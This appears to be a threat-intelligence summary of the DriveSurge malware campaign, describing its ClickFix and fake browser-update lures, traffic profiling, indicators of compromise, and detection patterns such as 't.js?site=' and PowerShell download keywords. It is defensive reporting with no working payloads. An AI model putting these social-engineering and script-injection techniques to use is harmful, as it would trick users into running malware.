Full Report
A threat actor tracked as DriveSurge has been operating large-scale malware distribution campaigns using ClickFix and FakeUpdates techniques on compromised sites. [...]
Analysis Summary
# Tool/Technique: DriveSurge (ClickFix & FakeUpdates)
## Overview
DriveSurge is a large-scale malware distribution campaign operated by a threat actor functioning primarily as an Initial Access Broker (IAB). The campaign utilizes a Pay-Per-Install (PPI) model, leveraging compromised high-reputation websites to deliver malware via social engineering tactics known as **ClickFix** and **FakeUpdates**. The operation utilizes a Traffic Distribution System (TDS) to profile visitors and serve platform-specific malicious payloads.
## Technical Details
- **Type**: Malware Distribution Campaign / Infrastructure
- **Platform**: Windows, macOS
- **Capabilities**: Profiling (via TDS), Social Engineering, Clipboard Hijacking, Remote Code Execution (via manual command execution).
- **First Seen**: September 2025 (Active through 2026)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1189 - Drive-by Compromise
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1204.001 - User Execution: Malicious Link
- T1204.002 - User Execution: Malicious File
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- **TA0007 - Discovery**
- T1082 - System Information Discovery (via zTDS profiling)
## Functionality
### Core Capabilities
- **zTDS (Traffic Distribution System)**: Uses an open-source TDS to filter web traffic, profile visitor environments (browser, OS), and redirect them to specific malware-delivery infrastructure.
- **FakeUpdates (SocGholish-style)**: Displays fraudulent browser update notifications (Chrome, Firefox, Safari, etc.) to trick users into downloading a malicious ZIP archive containing executables and DLLs.
- **ClickFix**: A social engineering technique where a website "error" is shown, instructing the user to copy/paste a malicious PowerShell command into their terminal to "fix" the issue.
### Advanced Features
- **Cross-Platform Targeting**: Specifically designed obfuscated JavaScript payloads to target macOS users.
- **Clipboard Hijacking**: Used in ClickFix attacks to facilitate the delivery of malicious commands into the user's buffer.
- **High-Reputation Hijacking**: Injects malicious scripts into thousands of legitimate websites to bypass domain reputation filters.
## Indicators of Compromise
- **File Names**:
- `Browser Update.exe`
- `t.js` (Script injector)
- **Network Indicators**:
- `t.js?site=[unique_id]` (Injection pattern)
- **Domains**:
- Over 80 identified malicious injection domains (Note: Specific domains defanged as per protocol, e.g., `example[.]com/t.js`).
- **Behavioral Indicators**:
- Redirects from legitimate sites to unfamiliar "update" or "verification" landing pages.
- Unexpected PowerShell or Terminal execution prompts following web browsing.
## Associated Threat Actors
- **DriveSurge** (Primary operator and Initial Access Broker).
## Detection Methods
- **Signature-based detection**: Scan for the specific JavaScript injection pattern `t.js?site=`.
- **Behavioral detection**:
- Monitor for PowerShell processes initiated with command-line arguments containing encoded strings or network download strings (e.g., `IEX`, `Invoke-WebRequest`).
- Detect unauthorized modifications to the system clipboard from browser processes.
- **Network Monitoring**: Identifying traffic to known zTDS redirection nodes or recently registered domains mimicking browser update centers.
## Mitigation Strategies
- **User Training**: Educate users never to copy/paste commands from a website into a terminal or command prompt.
- **Update Policy**: Enforce software updates only through official application settings (e.g., `About > Check for Updates`) or centralized management tools.
- **Browser Security**: Use ad-blockers and script-blocking extensions to prevent the execution of unauthorized JavaScript.
- **Endpoint Protection**: Deploy EDR solutions to block suspicious PowerShell execution and file downloads from unverified sources.
## Related Tools/Techniques
- **SocGholish (FakeUpdates)**: A similar campaign known for using fake browser updates to deliver RATs.
- **ClearFake**: Another campaign focused on fraudulent browser update overlays.
- **zTDS**: The open-source traffic distribution system used for redirection.